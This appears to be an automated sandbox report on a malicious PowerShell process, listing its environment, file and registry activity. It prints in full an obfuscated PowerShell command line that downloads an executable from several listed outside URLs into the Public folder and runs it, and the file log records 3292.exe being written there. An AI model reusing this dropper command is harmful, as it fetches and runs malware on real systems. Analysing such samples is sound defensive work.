| Get Environment String | name = =^he^l^l&&set |
|
1 | |
| Get Environment String | name = jiIZiKXbkZQMpuQ |
|
1 | |
| Get Environment String | name = =dipAbiiHEplZSHr&&! |
|
1 | |
| Get Environment String | name = !! |
|
2 | |
| Get Environment String | name = ! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp |
|
1 | |
| Get Environment String | name = %CdjPuLtXi%, result_out = p |
|
1 | |
| Get Environment String | name = %kiqjRiiiH%, result_out = owers |
|
1 | |
| Get Environment String | name = %QiiPPcnDM%, result_out = hell |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Set Environment String | name = %binkOHOTJcSMBkQ%, value = EINhmPkdO |
|
1 | |
| Set Environment String | name = %kiqjRiiiH%, value = owers |
|
1 | |
| Set Environment String | name = %zzwpVwCTCRDvTBu%, value = pOwoJiQoW |
|
1 | |
| Set Environment String | name = %CdjPuLtXi%, value = p |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) ) |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:19, Reason: Child Process |
| Unmonitor | End Time: 00:02:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:04 |
| Information | Value |
|---|---|
| PID | 0xaec |
| Parent PID | 0xad0 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AF0
0x
AF4
0x
B00
0x
B04
0x
B08
0x
B0C
0x
B14
0x
B18
0x
B1C
0x
B20
0x
B28
0x
B3C
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\public\3292.exe | 120.00 KB (122880 bytes) |
MD5:
ca6f2ee0e3b7218da76d126d22f707be
SHA1: a7fc89d6b45ce712c0be6600be4a8e6de9de434d SHA256: b4e2b553642c3772769b83c5be8623f22f90323e626d9c8945585368445af8a4 |
|
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\3292.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Users\aETAdzjz | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
7 | |
| Get Info | C:\Users | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\Public\3292.exe | type = file_type |
|
2 | |
| Get Info | C:\Users\Public\3292.exe | type = file_attributes |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 4096 |
|
41 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 4096 |
|
17 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 4096 |
|
62 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 3895 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 201, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 4096 |
|
21 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 3687 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 409, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 2228 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 844, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 3736 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 360, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 1459 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 0 |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
9 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
